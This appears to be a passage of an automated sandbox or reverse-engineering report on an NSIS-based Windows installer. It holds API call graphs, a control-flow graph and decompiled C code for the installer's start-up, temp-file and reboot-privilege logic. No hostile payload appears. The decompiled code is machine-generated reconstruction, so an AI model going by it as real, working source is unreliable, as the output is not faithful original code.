4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                      C-Code - Quality: 78%
                                      			_entry_() {
                                      				WCHAR* _v8;
                                      				signed int _v12;
                                      				void* _v16;
                                      				signed int _v20;
                                      				int _v24;
                                      				int _v28;
                                      				struct _TOKEN_PRIVILEGES _v40;
                                      				signed char _v42;
                                      				int _v44;
                                      				signed int _v48;
                                      				intOrPtr _v278;
                                      				signed short _v310;
                                      				struct _OSVERSIONINFOW _v324;
                                      				struct _SHFILEINFOW _v1016;
                                      				intOrPtr* _t88;
                                      				intOrPtr* _t94;
                                      				void _t97;
                                      				void* _t116;
                                      				WCHAR* _t118;
                                      				signed int _t119;
                                      				intOrPtr* _t123;
                                      				void* _t137;
                                      				void* _t143;
                                      				void* _t148;
                                      				void* _t152;
                                      				void* _t157;
                                      				signed int _t167;
                                      				void* _t170;
                                      				void* _t175;
                                      				intOrPtr _t177;
                                      				intOrPtr _t178;
                                      				intOrPtr* _t179;
                                      				int _t188;
                                      				void* _t189;
                                      				void* _t198;
                                      				signed int _t204;
                                      				signed int _t209;
                                      				signed int _t214;
                                      				int* _t218;
                                      				signed int _t226;
                                      				signed int _t229;
                                      				CHAR* _t231;
                                      				signed int _t233;
                                      				WCHAR* _t234;
                                      
                                      				0x435000 = 0x20;
                                      				_t188 = 0;
                                      				_v24 = 0;
                                      				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                                      				_v20 = 0;
                                      				SetErrorMode(0x8001); // executed
                                      				_v324.szCSDVersion = 0;
                                      				_v48 = 0;
                                      				_v44 = 0;
                                      				_v324.dwOSVersionInfoSize = 0x11c;
                                      				if(GetVersionExW( &_v324) == 0) {
                                      					_v324.dwOSVersionInfoSize = 0x114;
                                      					GetVersionExW( &_v324);
                                      					asm("sbb eax, eax");
                                      					_v42 = 4;
                                      					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                                      				}
                                      				if(_v324.dwMajorVersion < 0xa) {
                                      					_v310 = _v310 & 0x00000000;
                                      				}
                                      				 *0x42a318 = _v324.dwBuildNumber;
                                      				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                                      				if( *0x42a31e != 0x600) {
                                      					_t179 = E00406A35(_t188);
                                      					if(_t179 != _t188) {
                                      						 *_t179(0xc00);
                                      					}
                                      				}
                                      				_t231 = "UXTHEME";
                                      				do {
                                      					E004069C5(_t231); // executed
                                      					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                                      				} while ( *_t231 != 0);
                                      				E00406A35(0xb);
                                      				 *0x42a264 = E00406A35(9);
                                      				_t88 = E00406A35(7);
                                      				if(_t88 != _t188) {
                                      					_t88 =  *_t88(0x1e);
                                      					if(_t88 != 0) {
                                      						 *0x42a31c =  *0x42a31c | 0x00000080;
                                      					}
                                      				}
                                      				__imp__#17();
                                      				__imp__OleInitialize(_t188); // executed
                                      				 *0x42a320 = _t88;
                                      				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                                      				E00406668(0x429260, L"NSIS Error");
                                      				E00406668(0x435000, GetCommandLineW());
                                      				_t94 = 0x435000;
                                      				_t233 = 0x22;
                                      				 *0x42a260 = 0x400000;
                                      				if( *0x435000 == _t233) {
                                      					_t94 = 0x435002;
                                      				}
                                      				_t198 = CharNextW(E00405F64(_t94, 0x435000));
                                      				_v16 = _t198;
                                      				while(1) {
                                      					_t97 =  *_t198;
                                      					_t251 = _t97 - _t188;
                                      					if(_t97 == _t188) {
                                      						break;
                                      					}
                                      					_t209 = 0x20;
                                      					__eflags = _t97 - _t209;
                                      					if(_t97 != _t209) {
                                      						L17:
                                      						__eflags =  *_t198 - _t233;
                                      						_v12 = _t209;
                                      						if( *_t198 == _t233) {
                                      							_v12 = _t233;
                                      							_t198 = _t198 + 2;
                                      							__eflags = _t198;
                                      						}
                                      						__eflags =  *_t198 - 0x2f;
                                      						if( *_t198 != 0x2f) {
                                      							L32:
                                      							_t198 = E00405F64(_t198, _v12);
                                      							__eflags =  *_t198 - _t233;
                                      							if(__eflags == 0) {
                                      								_t198 = _t198 + 2;
                                      								__eflags = _t198;
                                      							}
                                      							continue;
                                      						} else {
                                      							_t198 = _t198 + 2;
                                      							__eflags =  *_t198 - 0x53;
                                      							if( *_t198 != 0x53) {
                                      								L24:
                                      								asm("cdq");
                                      								asm("cdq");
                                      								_t214 = L"NCRC" & 0x0000ffff;
                                      								asm("cdq");
                                      								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                                      								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                                      								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                                      									L29:
                                      									asm("cdq");
                                      									asm("cdq");
                                      									_t209 = L" /D=" & 0x0000ffff;
                                      									asm("cdq");
                                      									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                                      									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                                      									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                                      										L31:
                                      										_t233 = 0x22;
                                      										goto L32;
                                      									}
                                      									__eflags =  *_t198 - _t229;
                                      									if( *_t198 == _t229) {
                                      										 *(_t198 - 4) = _t188;
                                      										__eflags = _t198;
                                      										E00406668(0x435800, _t198);
                                      										L37:
                                      										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
                                      										GetTempPathW(0x400, _t234);
                                      										_t116 = E0040360F(_t198, _t251);
                                      										_t252 = _t116;
                                      										if(_t116 != 0) {
                                      											L40:
                                      											DeleteFileW(L"1033"); // executed
                                      											_t118 = E004030D0(_t254, _v20); // executed
                                      											_v8 = _t118;
                                      											if(_t118 != _t188) {
                                      												L68:
                                      												ExitProcess(); // executed
                                      												__imp__OleUninitialize(); // executed
                                      												if(_v8 == _t188) {
                                      													if( *0x42a2f4 == _t188) {
                                      														L77:
                                      														_t119 =  *0x42a30c;
                                      														if(_t119 != 0xffffffff) {
                                      															_v24 = _t119;
                                      														}
                                      														ExitProcess(_v24);
                                      													}
                                      													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                                      														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                                      														_v40.PrivilegeCount = 1;
                                      														_v28 = 2;
                                      														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                                      													}
                                      													_t123 = E00406A35(4);
                                      													if(_t123 == _t188) {
                                      														L75:
                                      														if(ExitWindowsEx(2, 0x80040002) != 0) {
                                      															goto L77;
                                      														}
                                      														goto L76;
                                      													} else {
                                      														_push(0x80040002);
                                      														_push(0x25);
                                      														_push(_t188);
                                      														_push(_t188);
                                      														_push(_t188);
                                      														if( *_t123() == 0) {
                                      															L76:
                                      															E0040140B(9);
                                      															goto L77;
                                      														}
                                      														goto L75;
                                      													}
                                      												}
                                      												E00405CC8(_v8, 0x200010);
                                      												ExitProcess(2);
                                      											}
                                      											if( *0x42a27c == _t188) {
                                      												L51:
                                      												 *0x42a30c =  *0x42a30c | 0xffffffff;
                                      												_v24 = E00403D17(_t264);
                                      												goto L68;
                                      											}
                                      											_t218 = E00405F64(0x435000, _t188);
                                      											if(_t218 < 0x435000) {
                                      												L48:
                                      												_t263 = _t218 - 0x435000;
                                      												_v8 = L"Error launching installer";
                                      												if(_t218 < 0x435000) {
                                      													_t189 = E00405C33(__eflags);
                                      													lstrcatW(_t234, L"~nsu");
                                      													__eflags = _t189;
                                      													if(_t189 != 0) {
                                      														lstrcatW(_t234, "A");
                                      													}
